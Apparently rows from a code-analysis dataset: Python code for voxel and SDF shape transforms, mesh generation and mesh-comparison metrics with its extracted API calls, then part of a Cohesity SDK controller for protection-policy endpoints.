[0, 0, 0, 1]])
def RotateAlongAxis(theta, a, b, c):
return np.array([[a**2*(1-np.cos(D2R*theta)) + np.cos(D2R*theta), a*b*(1-np.cos(D2R*theta)) - c*np.sin(D2R*theta), a*c*(1-np.cos(D2R*theta)) + b*np.sin(D2R*theta), 0],
[a*b*(1-np.cos(D2R*theta)) + c*np.sin(D2R*theta), b**2*(1-np.cos(D2R*theta)) + np.cos(D2R*theta), b*c*(1-np.cos(D2R*theta)) - a*np.sin(D2R*theta), 0],
[a*c*(1-np.cos(D2R*theta)) - b*np.sin(D2R*theta), b*c*(1-np.cos(D2R*theta)) + a*np.sin(D2R*theta), c**2*(1-np.cos(D2R*theta)) + np.cos(D2R*theta), 0],
[0, 0, 0, 1]])
# generate meshgrid
# [depth, height, width]
def get_meshgrid(depth = voxsize, height = voxsize, width = voxsize, ratio = 1.0):
x_mesh = np.repeat(np.repeat(np.linspace(-ratio, ratio, width)[np.newaxis, :], height, axis=0)[np.newaxis, :, :], depth, axis=0)
y_mesh = np.repeat(np.repeat(np.linspace(-ratio, ratio, height)[:, np.newaxis], width, axis=-1)[np.newaxis, :, :], depth, axis=0)
z_mesh = np.repeat(np.repeat(np.linspace(-ratio, ratio, depth)[:, np.newaxis], height, axis= -1)[:,:, np.newaxis], width, axis=-1)
x_expand = np.expand_dims(x_mesh, axis = -1)
y_expand = np.expand_dims(y_mesh, axis = -1)
z_expand = np.expand_dims(z_mesh, axis = -1)
meshgrid = np.concatenate((x_expand, np.concatenate((y_expand, z_expand), axis = -1)), axis = -1)
return meshgrid
# transform meshgrid given transformation matrix
def get_transformed_meshgrid(meshgrid, transform_matrix, depth = voxsize, height = voxsize, width = voxsize):
meshgrid_flat = meshgrid.transpose(3, 0, 1, 2).reshape(3,-1)
one = np.ones((1, meshgrid_flat.shape[1]))
meshgrid_expand = np.vstack((meshgrid_flat, one))
transformed_meshgrid = (transform_matrix @ meshgrid_expand)
transformed_meshgrid = (transformed_meshgrid[0:3, :]/transformed_meshgrid[3, :]).reshape(3, depth, height, width).transpose(1, 2, 3, 0)
return torch.tensor(transformed_meshgrid, dtype=torch.float)
######################
# single transform #
######################
# compute transformation matrix
def get_transform_matrix(azimuth, elevation, scale = np.sqrt(3)):
rot_base = RotateAlongAxis(90, 0, 0, 1) @ RotateAlongAxis(-90, 1, 0, 0)
rot_m = RotateAlongAxis(azimuth, 0, 1, 0) @ RotateAlongAxis(-elevation, 1, 0, 0) @ rot_base
sca_m = np.array([[scale, 0, 0, 0],
[0, scale, 0, 0],
[0, 0, scale, 0],
[0, 0, 0, 1]])
return rot_m @ sca_m
# group function for transform voxel in pytorch tensor
def get_transformed_vox(vox_torch, azimuth, elevation, scale = np.sqrt(3)):
meshgird = get_transformed_meshgrid(get_meshgrid(voxsize, voxsize, voxsize), get_transform_matrix(azimuth, elevation, scale), voxsize, voxsize, voxsize)
transformedVox = F.grid_sample(vox_torch, meshgird.unsqueeze(0), mode='bilinear', padding_mode='zeros', align_corners=False)
return transformedVox[0]
########################
# Relative transform #
########################
def get_relative_transform_matrix(azimuth_1, elevation_1, azimuth_2, elevation_2):
rot_m = RotateAlongAxis(elevation_1, 0, 0, 1) @ RotateAlongAxis(azimuth_1, 1, 0, 0) @ RotateAlongAxis(azimuth_2, 1, 0, 0) @ RotateAlongAxis(elevation_2, 0, 0, 1)
scale = 1
#scale = 1/np.sqrt(3)
sca_m = np.array([[scale, 0, 0, 0],
[0, scale, 0, 0],
[0, 0, scale, 0],
[0, 0, 0, 1]])
return rot_m @ sca_m
def get_relative_transformed_vox(vox_torch, azimuth_1, elevation_1, azimuth_2, elevation_2, device, voxsize = 32, align_mode = 'zeros'):
meshgird = get_transformed_meshgrid(get_meshgrid(voxsize, voxsize, voxsize),
get_relative_transform_matrix(azimuth_1, elevation_1, azimuth_2, elevation_2),
voxsize, voxsize, voxsize).to(device)
transformedVox = F.grid_sample(vox_torch, meshgird.unsqueeze(0), mode='bilinear', padding_mode=align_mode, align_corners=False)
return transformedVox
#########
# SDF #
#########
# transformation function to rotate sdf indice
def get_transform_matrix_sdf(azimuth, elevation, scale = 1.0):
rot_base = RotateAlongAxis(90, 0, 1, 0) @ RotateAlongAxis(-90, 1, 0, 0)
rot_m = RotateAlongAxis(azimuth, 0, 1, 0) @ RotateAlongAxis(-elevation, 0, 0, 1) @ rot_base
sca_m = np.array([[scale, 0, 0, 0],
[0, scale, 0, 0],
[0, 0, scale, 0],
[0, 0, 0, 1]])
return rot_m @ sca_m
# group function to get transformed sdf indice
def get_transformed_indices(indices, azimuth, elevation, scale = 1/np.sqrt(3)):
transform_matrix = get_transform_matrix_sdf(-azimuth, -elevation, scale)[0:3, 0:3]
transformed_indices = indices @ transform_matrix
return transformed_indices
# convert sdf to voxel
def sdf2Voxel(sample_pt, sample_sdf_val, fill = 0):
sample_pt = ((sample_pt + np.array([0.5, 0.5, 0.5]))* voxsize).astype(int)
sample_pt = np.clip(sample_pt, 0, voxsize-1)
v = fill * np.ones((voxsize, voxsize, voxsize))
v[sample_pt[:,0], sample_pt[:,1], sample_pt[:,2]] = sample_sdf_val
return v
# advanced indexing 2x2x2 context from voxel
def getContext(sample_pt_query, vox):
# sample_pt bxcxdimxdimxdim
# vox bxmx3
channel_size = vox.shape[1]
batch_size, sample_size, _ = sample_pt_query.shape
meshgrid_base = torch.Tensor(np.meshgrid(np.arange(0, batch_size), np.arange(0, channel_size), np.arange(0, 2), np.arange(0, 2), np.arange(0, 2))).int()
context = torch.empty((batch_size, sample_size, channel_size, 2, 2, 2))
for j in range(context.shape[1]):
context[:, j, :, :, :, :] = vox[
meshgrid_base[0].long(),
meshgrid_base[1].long(),
(meshgrid_base[2] + sample_pt_query[:, j, 0].reshape(1, -1, 1, 1, 1)).long(),
(meshgrid_base[3] + sample_pt_query[:, j, 1].reshape(1, -1, 1, 1, 1)).long(),
(meshgrid_base[4] + sample_pt_query[:, j, 2].reshape(1, -1, 1, 1, 1)).long()
].transpose(0, 1)
# b x c x m x 2 x 2 x 2
return context.transpose(1, 2)
def trilinearInterpolation(context, dx, dy, dz):
v0 = context[:, :, :, 0, 0, 0]*(1-dx)*(1-dy)*(1-dz)
v1 = context[:, :, :, 1, 0, 0]*dx*(1-dy)*(1-dz)
v2 = context[:, :, :, 0, 1, 0]*(1-dx)*dy*(1-dz)
v3 = context[:, :, :, 1, 1, 0]*dx*dy*(1-dz)
v4 = context[:, :, :, 0, 0, 1]*(1-dx)*(1-dy)*dz
v5 = context[:, :, :, 1, 0, 1]*dx*(1-dy)*dz
v6 = context[:, :, :, 0, 1, 1]*(1-dx)*dy*dz
v7 = context[:, :, :, 1, 1, 1]*dx*dy*dz
# b x c x m 1
return v0 + v1 + v2 + v3 + v4 + v5 + v6 + v7
# generate mesh from continuous model
def generate_mesh(continuous, unet, out_vox, z, device, vox_res = 32, grid_res = 64, batch_size = 32, azimuth = 0, elevation = 0, isosurface = 0.0, conditional=True):
start_time = time.time()
vox = np.zeros((grid_res, grid_res, grid_res))
idx = np.array(np.where(vox == 0))
# normalize
sample_pt = (torch.t(torch.tensor(idx/grid_res, dtype=torch.float)) - 0.5)
sample_pt = sample_pt.reshape(-1, sample_size, 3)
sample_pt_normalized = sample_pt + torch.tensor([0.5, 0.5, 0.5])
# (0, 63)
sample_pt_scale = torch.clamp(sample_pt_normalized* (vox_res-1), 0, (vox_res-1)-1e-5)
# (0, 62]
sample_pt_query = torch.clamp((sample_pt_scale).int(), 0, (vox_res-2))
sample_pt_distance = sample_pt_scale - sample_pt_query
vox_feature = unet(out_vox, z).repeat(batch_size, 1, 1, 1, 1).detach().cpu() if conditional else unet(out_vox).repeat(batch_size, 1, 1, 1, 1).detach().cpu()
#print("--- %s seconds ---" % (time.time() - start_time))
#print("Data generation")
pre_sdf_list = []
for i in range(int(sample_pt.shape[0]/batch_size)):
start = i*batch_size
end = (i + 1)*batch_size
context = getContext(sample_pt_query[start:end, :, :], vox_feature)
dx = sample_pt_distance[start:end, :, 0].unsqueeze(1)
dy = sample_pt_distance[start:end, :, 1].unsqueeze(1)
dz = sample_pt_distance[start:end, :, 2].unsqueeze(1)
# local feature
con = trilinearInterpolation(context, dx, dy, dz).to(device)
# global feature
latent = z.squeeze(-1).squeeze(-1).repeat(batch_size, 1, sample_size)
# point
sample_pt_batch = sample_pt[start:end, :, :].transpose(-1, -2).to(device)
sample_pt_batch = sample_pt_batch.transpose(-1, -2).reshape(-1, 3)
con_batch = con.transpose(-1, -2).reshape(-1, 32)
z_batch = latent.transpose(-1, -2).reshape(-1, 256)
# avoid occupying gpu memory
pred_sdf_batch = continuous(sample_pt_batch,
con_batch,
z_batch,
).squeeze(1).detach().cpu()
pre_sdf_list.append(pred_sdf_batch)
pred_sdf = torch.cat(pre_sdf_list).reshape(-1,)
vox[tuple([idx[0], idx[1], idx[2]])] = pred_sdf[:].numpy()
#print(vox.shape)
#print("--- %s seconds ---" % (time.time() - start_time))
#print("Success generation")
try:
verts, faces, _, _ = sk.marching_cubes_lewiner(vox, level=isosurface)
#mesh = pymesh.form_mesh(verts, faces)
#transform_matrix = get_relative_transform_matrix(azimuth, elevation, 0, 0)[0:3, 0:3]
#transformed_vertices = mesh.vertices @ transform_matrix
mesh = trimesh.Trimesh(verts, faces)
#trimesh.repair.fix_inversion(mesh)
trimesh.repair.fill_holes(mesh)
mesh_py = pymesh.form_mesh(mesh.vertices, mesh.faces)
return mesh_py
except:
print("Failed generation")
return None
# generate mesh from voxel
def mesh_from_voxel(vox_torch):
verts, faces, _, _ = sk.marching_cubes_lewiner(vox_torch.detach().cpu().numpy(), level=0.5)
mesh_py = pymesh.form_mesh(2*verts, faces)
mesh = trimesh.Trimesh(mesh_py.vertices,mesh_py.faces)
trimesh.repair.fix_inversion(mesh)
trimesh.repair.fill_holes(mesh)
return mesh
# render a mesh with pyrender render
def render(mesh):
model = trimesh.Trimesh(mesh.vertices,mesh.faces)
mesh_py = pyrender.Mesh.from_trimesh(model)
scene = pyrender.Scene()
scene.add(mesh_py)
viewer = pyrender.Viewer(scene, use_raymond_lighting=True, point_size=2)
def mesh_test(mesh_py, dim = 64, count = 16384):
mesh = trimesh.Trimesh(mesh_py.vertices, mesh_py.faces)
samples, _ = trimesh.sample.sample_surface(mesh, count)
samples_batch = torch.tensor(samples.reshape(64, -1, 3), dtype = torch.float)
grid = pymesh.VoxelGrid(2./dim)
grid.insert_mesh(mesh_py)
grid.create_grid()
idx = ((grid.mesh.vertices + 1.1) / 2.4 * dim).astype(np.int)
v = np.zeros([dim, dim, dim])
v[idx[:,0], idx[:,1], idx[:,2]] = 1
return samples_batch, samples, v
# compute chamfer distance, earth movers' distacne and intersection over union between two meshes
def get_test_results(mesh_py_1, mesh_py_2):
samples_batch_1, samples_1, v1 = mesh_test(mesh_py_1)
samples_batch_2, samples_2, v2 = mesh_test(mesh_py_2)
dist1, dist2, _, _ = chamfer_python.distChamfer(samples_batch_1, samples_batch_2)
chamfer_dist = torch.mean(dist1) + torch.mean(dist2)
emd = emd_samples(samples_1, samples_2)
intersection = np.sum(np.logical_and(v1, v2))
union = np.sum(np.logical_or(v1, v2))
iou = intersection/union
return chamfer_dist, emd, iou
| [
"numpy.clip",
"numpy.sqrt",
"pyemd.emd_samples",
"trimesh.sample.sample_surface",
"skimage.measure.marching_cubes_lewiner",
"numpy.array",
"numpy.sin",
"numpy.arange",
"numpy.where",
"torch.mean",
"numpy.linspace",
"pymesh.form_mesh",
"numpy.vstack",
"numpy.concatenate",
"pyrender.Mesh.f... | [((2036, 2067), 'numpy.expand_dims', 'np.expand_dims', (['x_mesh'], {'axis': '(-1)'}), '(x_mesh, axis=-1)\n', (2050, 2067), True, 'import numpy as np\n'), ((2085, 2116), 'numpy.expand_dims', 'np.expand_dims', (['y_mesh'], {'axis': '(-1)'}), '(y_mesh, axis=-1)\n', (2099, 2116), True, 'import numpy as np\n'), ((2134, 2165), 'numpy.expand_dims', 'np.expand_dims', (['z_mesh'], {'axis': '(-1)'}), '(z_mesh, axis=-1)\n', (2148, 2165), True, 'import numpy as np\n'), ((2535, 2571), 'numpy.ones', 'np.ones', (['(1, meshgrid_flat.shape[1])'], {}), '((1, meshgrid_flat.shape[1]))\n', (2542, 2571), True, 'import numpy as np\n'), ((2594, 2625), 'numpy.vstack', 'np.vstack', (['(meshgrid_flat, one)'], {}), '((meshgrid_flat, one))\n', (2603, 2625), True, 'import numpy as np\n'), ((2851, 2904), 'torch.tensor', 'torch.tensor', (['transformed_meshgrid'], {'dtype': 'torch.float'}), '(transformed_meshgrid, dtype=torch.float)\n', (2863, 2904), False, 'import torch\n'), ((3062, 3072), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (3069, 3072), True, 'import numpy as np\n'), ((3274, 3352), 'numpy.array', 'np.array', (['[[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]]'], {}), '([[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]])\n', (3282, 3352), True, 'import numpy as np\n'), ((3573, 3583), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (3580, 3583), True, 'import numpy as np\n'), ((4297, 4375), 'numpy.array', 'np.array', (['[[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]]'], {}), '([[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]])\n', (4305, 4375), True, 'import numpy as np\n'), ((5395, 5473), 'numpy.array', 'np.array', (['[[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]]'], {}), '([[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]])\n', (5403, 5473), True, 'import numpy as np\n'), ((6062, 6096), 'numpy.clip', 'np.clip', (['sample_pt', '(0)', '(voxsize 
- 1)'], {}), '(sample_pt, 0, voxsize - 1)\n', (6069, 6096), True, 'import numpy as np\n'), ((6650, 6711), 'torch.empty', 'torch.empty', (['(batch_size, sample_size, channel_size, 2, 2, 2)'], {}), '((batch_size, sample_size, channel_size, 2, 2, 2))\n', (6661, 6711), False, 'import torch\n'), ((8042, 8053), 'time.time', 'time.time', ([], {}), '()\n', (8051, 8053), False, 'import time\n'), ((8069, 8109), 'numpy.zeros', 'np.zeros', (['(grid_res, grid_res, grid_res)'], {}), '((grid_res, grid_res, grid_res))\n', (8077, 8109), True, 'import numpy as np\n'), ((8413, 8486), 'torch.clamp', 'torch.clamp', (['(sample_pt_normalized * (vox_res - 1))', '(0)', '(vox_res - 1 - 1e-05)'], {}), '(sample_pt_normalized * (vox_res - 1), 0, vox_res - 1 - 1e-05)\n', (8424, 8486), False, 'import torch\n'), ((11192, 11226), 'pymesh.form_mesh', 'pymesh.form_mesh', (['(2 * verts)', 'faces'], {}), '(2 * verts, faces)\n', (11208, 11226), False, 'import pymesh\n'), ((11236, 11284), 'trimesh.Trimesh', 'trimesh.Trimesh', (['mesh_py.vertices', 'mesh_py.faces'], {}), '(mesh_py.vertices, mesh_py.faces)\n', (11251, 11284), False, 'import trimesh\n'), ((11288, 11322), 'trimesh.repair.fix_inversion', 'trimesh.repair.fix_inversion', (['mesh'], {}), '(mesh)\n', (11316, 11322), False, 'import trimesh\n'), ((11327, 11358), 'trimesh.repair.fill_holes', 'trimesh.repair.fill_holes', (['mesh'], {}), '(mesh)\n', (11352, 11358), False, 'import trimesh\n'), ((11452, 11494), 'trimesh.Trimesh', 'trimesh.Trimesh', (['mesh.vertices', 'mesh.faces'], {}), '(mesh.vertices, mesh.faces)\n', (11467, 11494), False, 'import trimesh\n'), ((11508, 11541), 'pyrender.Mesh.from_trimesh', 'pyrender.Mesh.from_trimesh', (['model'], {}), '(model)\n', (11534, 11541), False, 'import pyrender\n'), ((11554, 11570), 'pyrender.Scene', 'pyrender.Scene', ([], {}), '()\n', (11568, 11570), False, 'import pyrender\n'), ((11607, 11670), 'pyrender.Viewer', 'pyrender.Viewer', (['scene'], {'use_raymond_lighting': '(True)', 'point_size': '(2)'}), 
'(scene, use_raymond_lighting=True, point_size=2)\n', (11622, 11670), False, 'import pyrender\n'), ((11746, 11794), 'trimesh.Trimesh', 'trimesh.Trimesh', (['mesh_py.vertices', 'mesh_py.faces'], {}), '(mesh_py.vertices, mesh_py.faces)\n', (11761, 11794), False, 'import trimesh\n'), ((11812, 11854), 'trimesh.sample.sample_surface', 'trimesh.sample.sample_surface', (['mesh', 'count'], {}), '(mesh, count)\n', (11841, 11854), False, 'import trimesh\n'), ((11958, 11985), 'pymesh.VoxelGrid', 'pymesh.VoxelGrid', (['(2.0 / dim)'], {}), '(2.0 / dim)\n', (11974, 11985), False, 'import pymesh\n'), ((12115, 12140), 'numpy.zeros', 'np.zeros', (['[dim, dim, dim]'], {}), '([dim, dim, dim])\n', (12123, 12140), True, 'import numpy as np\n'), ((12518, 12578), 'chamfer_python.distChamfer', 'chamfer_python.distChamfer', (['samples_batch_1', 'samples_batch_2'], {}), '(samples_batch_1, samples_batch_2)\n', (12544, 12578), False, 'import chamfer_python\n'), ((12651, 12684), 'pyemd.emd_samples', 'emd_samples', (['samples_1', 'samples_2'], {}), '(samples_1, samples_2)\n', (12662, 12684), False, 'from pyemd import emd_samples\n'), ((5686, 5696), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (5693, 5696), True, 'import numpy as np\n'), ((6115, 6151), 'numpy.ones', 'np.ones', (['(voxsize, voxsize, voxsize)'], {}), '((voxsize, voxsize, voxsize))\n', (6122, 6151), True, 'import numpy as np\n'), ((8129, 8147), 'numpy.where', 'np.where', (['(vox == 0)'], {}), '(vox == 0)\n', (8137, 8147), True, 'import numpy as np\n'), ((8347, 8376), 'torch.tensor', 'torch.tensor', (['[0.5, 0.5, 0.5]'], {}), '([0.5, 0.5, 0.5])\n', (8359, 8376), False, 'import torch\n'), ((10461, 10509), 'skimage.measure.marching_cubes_lewiner', 'sk.marching_cubes_lewiner', (['vox'], {'level': 'isosurface'}), '(vox, level=isosurface)\n', (10486, 10509), True, 'import skimage.measure as sk\n'), ((10731, 10760), 'trimesh.Trimesh', 'trimesh.Trimesh', (['verts', 'faces'], {}), '(verts, faces)\n', (10746, 10760), False, 'import 
trimesh\n'), ((10813, 10844), 'trimesh.repair.fill_holes', 'trimesh.repair.fill_holes', (['mesh'], {}), '(mesh)\n', (10838, 10844), False, 'import trimesh\n'), ((10863, 10906), 'pymesh.form_mesh', 'pymesh.form_mesh', (['mesh.vertices', 'mesh.faces'], {}), '(mesh.vertices, mesh.faces)\n', (10879, 10906), False, 'import pymesh\n'), ((12598, 12615), 'torch.mean', 'torch.mean', (['dist1'], {}), '(dist1)\n', (12608, 12615), False, 'import torch\n'), ((12618, 12635), 'torch.mean', 'torch.mean', (['dist2'], {}), '(dist2)\n', (12628, 12635), False, 'import torch\n'), ((12716, 12738), 'numpy.logical_and', 'np.logical_and', (['v1', 'v2'], {}), '(v1, v2)\n', (12730, 12738), True, 'import numpy as np\n'), ((12759, 12780), 'numpy.logical_or', 'np.logical_or', (['v1', 'v2'], {}), '(v1, v2)\n', (12772, 12780), True, 'import numpy as np\n'), ((2214, 2259), 'numpy.concatenate', 'np.concatenate', (['(y_expand, z_expand)'], {'axis': '(-1)'}), '((y_expand, z_expand), axis=-1)\n', (2228, 2259), True, 'import numpy as np\n'), ((8195, 8242), 'torch.tensor', 'torch.tensor', (['(idx / grid_res)'], {'dtype': 'torch.float'}), '(idx / grid_res, dtype=torch.float)\n', (8207, 8242), False, 'import torch\n'), ((10185, 10208), 'torch.cat', 'torch.cat', (['pre_sdf_list'], {}), '(pre_sdf_list)\n', (10194, 10208), False, 'import torch\n'), ((382, 399), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', (388, 399), True, 'import numpy as np\n'), ((399, 416), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (405, 416), True, 'import numpy as np\n'), ((464, 481), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', (470, 481), True, 'import numpy as np\n'), ((617, 634), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', (623, 634), True, 'import numpy as np\n'), ((634, 651), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (640, 651), True, 'import numpy as np\n'), ((699, 716), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', 
(705, 716), True, 'import numpy as np\n'), ((447, 464), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (453, 464), True, 'import numpy as np\n'), ((682, 699), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (688, 699), True, 'import numpy as np\n'), ((933, 952), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (939, 952), True, 'import numpy as np\n'), ((1155, 1174), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1161, 1174), True, 'import numpy as np\n'), ((1377, 1396), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1383, 1396), True, 'import numpy as np\n'), ((1647, 1680), 'numpy.linspace', 'np.linspace', (['(-ratio)', 'ratio', 'width'], {}), '(-ratio, ratio, width)\n', (1658, 1680), True, 'import numpy as np\n'), ((1780, 1814), 'numpy.linspace', 'np.linspace', (['(-ratio)', 'ratio', 'height'], {}), '(-ratio, ratio, height)\n', (1791, 1814), True, 'import numpy as np\n'), ((1914, 1947), 'numpy.linspace', 'np.linspace', (['(-ratio)', 'ratio', 'depth'], {}), '(-ratio, ratio, depth)\n', (1925, 1947), True, 'import numpy as np\n'), ((5997, 6022), 'numpy.array', 'np.array', (['[0.5, 0.5, 0.5]'], {}), '([0.5, 0.5, 0.5])\n', (6005, 6022), True, 'import numpy as np\n'), ((6524, 6548), 'numpy.arange', 'np.arange', (['(0)', 'batch_size'], {}), '(0, batch_size)\n', (6533, 6548), True, 'import numpy as np\n'), ((6550, 6576), 'numpy.arange', 'np.arange', (['(0)', 'channel_size'], {}), '(0, channel_size)\n', (6559, 6576), True, 'import numpy as np\n'), ((6578, 6593), 'numpy.arange', 'np.arange', (['(0)', '(2)'], {}), '(0, 2)\n', (6587, 6593), True, 'import numpy as np\n'), ((6595, 6610), 'numpy.arange', 'np.arange', (['(0)', '(2)'], {}), '(0, 2)\n', (6604, 6610), True, 'import numpy as np\n'), ((6612, 6627), 'numpy.arange', 'np.arange', (['(0)', '(2)'], {}), '(0, 2)\n', (6621, 6627), True, 'import numpy as np\n'), ((982, 1001), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * 
theta)\n', (988, 1001), True, 'import numpy as np\n'), ((1031, 1050), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1037, 1050), True, 'import numpy as np\n'), ((1107, 1126), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1113, 1126), True, 'import numpy as np\n'), ((1204, 1223), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1210, 1223), True, 'import numpy as np\n'), ((1280, 1299), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1286, 1299), True, 'import numpy as np\n'), ((1329, 1348), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1335, 1348), True, 'import numpy as np\n'), ((912, 931), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (918, 931), True, 'import numpy as np\n'), ((959, 978), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (965, 978), True, 'import numpy as np\n'), ((1008, 1027), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1014, 1027), True, 'import numpy as np\n'), ((1084, 1103), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1090, 1103), True, 'import numpy as np\n'), ((1134, 1153), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1140, 1153), True, 'import numpy as np\n'), ((1181, 1200), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1187, 1200), True, 'import numpy as np\n'), ((1257, 1276), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1263, 1276), True, 'import numpy as np\n'), ((1306, 1325), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1312, 1325), True, 'import numpy as np\n'), ((1356, 1375), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1362, 1375), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import logging
from cohesity_management_sdk.api_helper import APIHelper
from cohesity_management_sdk.configuration import Configuration
from cohesity_management_sdk.controllers.base_controller import BaseController
from cohesity_management_sdk.http.auth.auth_manager import AuthManager
from cohesity_management_sdk.models.protection_policy import ProtectionPolicy
from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException
class ProtectionPolicies(BaseController):
"""A Controller to access Endpoints in the cohesity_management_sdk API."""
def __init__(self, client=None, call_back=None):
super(ProtectionPolicies, self).__init__(client, call_back)
self.logger = logging.getLogger(__name__)
def get_protection_policy_by_id(self,
id):
"""Does a GET request to /public/protectionPolicies/{id}.
Returns the Protection Policy corresponding to the specified Policy
Id.
Args:
id (string): Specifies a unique id of the Protection Policy to
return.
Returns:
ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('get_protection_policy_by_id called.')
# Validate required parameters
self.logger.info('Validating required parameters for get_protection_policy_by_id.')
self.validate_parameters(id=id)
# Prepare query URL
self.logger.info('Preparing query URL for get_protection_policy_by_id.')
_url_path = '/public/protectionPolicies/{id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'id': id
})
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for get_protection_policy_by_id.')
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for get_protection_policy_by_id.')
_request = self.http_client.get(_query_url, headers=_headers)
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'get_protection_policy_by_id')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for get_protection_policy_by_id.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
def update_protection_policy(self,
body,
id):
"""Does a PUT request to /public/protectionPolicies/{id}.
Returns the updated Protection Policy.
Args:
body (ProtectionPolicyRequest): Request to update a Protection
Policy.
id (string): Specifies a unique id of the Protection Policy to
return.
Returns:
ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('update_protection_policy called.')
# Validate required parameters
self.logger.info('Validating required parameters for update_protection_policy.')
self.validate_parameters(body=body,
id=id)
# Prepare query URL
self.logger.info('Preparing query URL for update_protection_policy.')
_url_path = '/public/protectionPolicies/{id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'id': id
})
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for update_protection_policy.')
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for update_protection_policy.')
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'update_protection_policy')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for update_protection_policy.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
def delete_protection_policy(self,
id):
"""Does a DELETE request to /public/protectionPolicies/{id}.
Returns Success if the Protection Policy is deleted.
Args:
id (string): Specifies a unique id of the Protection Policy to
return.
Returns:
void: Response from the API. No Content
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('delete_protection_policy called.')
# Validate required parameters
self.logger.info('Validating required parameters for delete_protection_policy.')
self.validate_parameters(id=id)
# Prepare query URL
self.logger.info('Preparing query URL for delete_protection_policy.')
_url_path = '/public/protectionPolicies/{id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'id': id
})
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare and execute request
self.logger.info('Preparing and executing request for delete_protection_policy.')
_request = self.http_client.delete(_query_url)
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'delete_protection_policy')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for delete_protection_policy.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
